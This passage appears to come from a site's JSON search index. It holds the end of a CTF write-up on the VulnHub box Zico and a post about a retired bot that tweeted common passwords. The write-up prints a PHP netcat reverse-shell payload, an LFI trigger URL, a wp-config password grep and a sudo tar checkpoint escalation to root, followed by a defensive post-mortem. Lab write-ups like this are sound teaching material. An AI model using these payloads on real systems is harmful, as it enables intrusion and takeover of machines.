We\u0026rsquo;ll break it down, step by step.\nCreate a new database with a name ending in \u0026quot;.php\u0026quot; Select this new database and create a new table with one field. Set the field to the \u0026ldquo;Text\u0026rdquo; type, and enter a php-command payload as the Default Value. I decided to use my most reliable netcat-based reverse-shell.\n\u0026lt;?php passthru(\u0026quot;rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2\u0026gt;\u0026amp;1|nc local.machine.ip.addr PORTNUM \u0026gt; /tmp/f\u0026quot;); ?\u0026gt;\nCreate the table, and set up the listener on your local machine. nc -lnvp PORTNUM\nVisiting the database in the browser, using our handy-dandy LFI vulnerability will run the payload and pop our shell. http://192.168.56.101/view.php?page=../../../../usr/databases/a.php\n3. From www-data to User # This shell could use some improvement, so let\u0026rsquo;s see if we can\u0026rsquo;t spawn a bash shell with a tty using python.\nwhich python which bash python -c 'import pty;pty.spawn(\u0026quot;/bin/bash\u0026quot;)'\nMy \u0026ldquo;advanced\u0026rdquo; powers of deduction tell me that we are going to have a user named zico. A user with a home directory, even.\nLet\u0026rsquo;s verify.\nls -la /home ls -la /home/zico\nLuckily for us, Zico doesn\u0026rsquo;t seem to mind if we read files in his home directory. Talk about courteous!\nZico seems to have even left a note behind for himself. Surely he won\u0026rsquo;t mind if we read that, too.\ncd /home/zico cat to_do.txt\nZico seems to be trying out some content management systems for a new website. The site we got through in order to get this shell used phpliteadmin, so Wordpress must be next.\nWe see Wordpress sites all the time in CTFs, and know it well enough to know where to look for the squishy bits.\ncd wordpress ls -l\nZico hasn\u0026rsquo;t implemented this site yet, so it may not have been combed through for sensitive info. 
wp-config.php can often contain passwords.\ngrep -i 'pass' wp-config.php\nA database password, nice. Let\u0026rsquo;s try it with SSH, because, why not?\n4. From Zico to Root # As the presumed owner of this box, Zico should be able to get some significant things done.\nsudo -l\ntar and zip are a bit strange to see as sudo-enabled commands. Can they be used for code execution?\nI searched online, and found some very interesting information at these two sites.\ntar can be run with flags that cause it to unarchive with \u0026ldquo;checkpoints.\u0026rdquo; At these points, the process will pause and take an action, then seamlessly resume.\nSince we can run tar as root, we just need to use these checkpoints to run some commands that escalate our privileges.\nRunning Tar As Root For Fun and Profit # Move to a \u0026ldquo;temporary\u0026rdquo; folder like /dev/shm and create a file that we will compress.\nCompress it with tar as Zico. No need to run as root just yet.\nUnarchive the newly created .tar, making sure to use sudo and including the flags to add a checkpoint and commands.\nThe commands will run along with the .tar command, so any output from the commands will appear in the terminal\nOur test payload is the (redundant) command echo $(id), which will output the info belonging to the user who ran the tar command to the terminal.\nIf things go according to plan, we should see root\u0026rsquo;s info.\nsudo tar -xf archive.tar --checkpoint=1 --checkpoint-action=exec='echo $(id)' Our privesc concept is proven. 
We can just run /bin/bash as our checkpoint command to spawn a root shell.\nsudo tar -xf archive.tar --checkpoint=1 --checkpoint-action=exec='/bin/bash'\nAnd, we\u0026rsquo;re root.\nGo to the /root directory and grab the flag.\ncd /root ls cat flag.txt\nPost-Mortem # This CTF was purposefully made porous, but these vulnerabilities can be found in the real world.\nHere\u0026rsquo;s what made Zico rootable.\nUse of Default/Obvious Credentials\nIn this scenario, Zico\u0026rsquo;s phpLiteAdmin database was just for testing purposes. However, admin is simply not a password that should be in use. It\u0026rsquo;s just too easy to guess. Had we not been able to gain access to the phpLiteAdmin panel, we may not have gotten any access at all. Local File Inclusion\nServing webpages with ?page= is a recipe for local file inclusion. Only one page was intended to be reached this way, and it wasn\u0026rsquo;t even the only link to this page on the site. Outdated Versions of 3rd Party Software\nThe phpLiteAdmin version used here isn\u0026rsquo;t even available for download from the phpLiteAdmin website. The code injection vulnerability we used to run our php payload was patched away in later versions. Credential Reuse\nThe password used by www-data in the wp-config.php file to access the website database was the same as the user\u0026rsquo;s password. Least Privilege Violations\nwww-data had unnecessary read access to zico\u0026rsquo;s home folder. If zico isn\u0026rsquo;t a superuser, I\u0026rsquo;m not sure what reason they would need to have to run tar and zip as root. Thanks for reading! # ","date":"12 March 2017","externalUrl":null,"permalink":"/archive/ctf-writeups/zico-vulnhub/","section":"Archive","summary":"","title":"CTF Writeup: Zico on VulnHub","type":"archive"},{"content":" Retired This bot is no longer operational. Keeping this post for posterity.\nIf the bot tweets one of your passwords, change it. 
# This is not the moment to say \u0026ldquo;haha, that is so me!\u0026rdquo; and like the tweet.\nYou are at an increased security risk.\nOverview # With the release of ProbableWordlists V2, we have a more accurate evidence-based list of the world\u0026rsquo;s most common passwords. The aim of the Probable-Wordlists project is to discourage the use of common passwords.\nBut, how do we know what passwords look like? Aren\u0026rsquo;t they supposed to be secret? If you are never supposed to tell me your passwords, and I am never going to tell you mine, how do we know we aren\u0026rsquo;t using the same passwords? How do we know we aren\u0026rsquo;t using the same password as millions of other people? We need to be warned what passwords are too risky to use.\n@WorstPasswords is a Twitter bot designed to do just this. Twice a day, it tweets a password from the list of the Top 747 Most Common Passwords. If someone witnesses the bot announcing their \u0026ldquo;secret\u0026rdquo; password, they may be driven to change it to something far more secure. Hopefully, the bot will inspire them to take the first step towards a more security-minded internet presence.\nOperation # It\u0026rsquo;s really a simple bot; here is the entire workflow.\nIs it time to post? Okay, pick a wordlist to read from. Pick a random line from that list. Tweet a post based on that line. Wait until the next time to post. It is incapable of querying any online lists or responding to mentions or direct messages. All it can do is tell time, pick numbers, and tweet.\nStatistically, the top 25 passwords on the list are far, far more common than the bottom 747. However, a bot that only posts 25 passwords isn\u0026rsquo;t very useful. 
I tried to strike a balance between tweeting the top 25 and the bottom 722 passwords on the bot\u0026rsquo;s list.\nI accomplished this by including a \u0026ldquo;coin flip\u0026rdquo; concept, albeit using a very weighted coin.\n20% of the time, the bot picks from the list of the Top 25 entries 80% of the time, the bot picks from the Bottom 722 entries. This way, the bot pulls from a large enough pool of possibilities to have variety, but the passwords that are the most common are weighted to appear more often than the less common ones.\n747 Is A Weird Number. Why not 750? # The concept of \u0026ldquo;the Nth most common password\u0026rdquo; is fuzzy - there are ties. Some passwords are equally common. This is why the tweets don\u0026rsquo;t say \u0026ldquo;this is the world\u0026rsquo;s Nth most popular password.\u0026rdquo;\nIf you are perusing the Probable Wordlists and suddenly see a section in obvious alphabetical order, you are seeing passwords that are all equally likely.\nHowever, instead of tweeting out every single password from, say, the 15th most common slot, the bot simply chooses one from the top 747 entries on the list.\nEach one of the passwords in the bot\u0026rsquo;s pool appeared at least 206 times in the Probable Wordlist V2 analysis. This is unrelated to the fact that the smallest Probable-Wordlist is 207 lines long; it is just a funny coincidence.\nPassword Reuse Warning # Using a common password is risky, but it is even more common to re-use passwords across accounts. I am very careful to say \u0026ldquo;one of your passwords\u0026rdquo; as opposed to \u0026ldquo;your password\u0026rdquo; for exactly this reason. 
Do not reuse passwords across accounts.\nDo not reuse passwords across accounts.\nUnique passwords can mean the difference between someone listening to music on your Spotify and writing emails in your name, gaining access to your bank account and posing as you to ask your Facebook friends for money.\nThis warning is possibly more important than awareness of the most common passwords - I had to include it.\nRetired This bot is no longer operational. Keeping this post for posterity.\nFollow @WorstPasswords to help remember the most common passwords on the planet! Thanks for reading!\n","date":"17 February 2017","externalUrl":null,"permalink":"/blog/worstpasswords/","section":"Blogs","summary":"A (now retired) automated Twitter bot that tweeted the worst passwords found in the Probable Wordlists V2.","title":"(RETIRED) WorstPasswords Twitter Bot","type":"blog"},{"content":"","externalUrl":null,"permalink":"/authors/","section":"Authors","summary":"","title":"Authors","type":"authors"},{"content":"","externalUrl":null,"permalink":"/categories/","section":"Categories","summary":"","title":"Categories","type":"categories"}]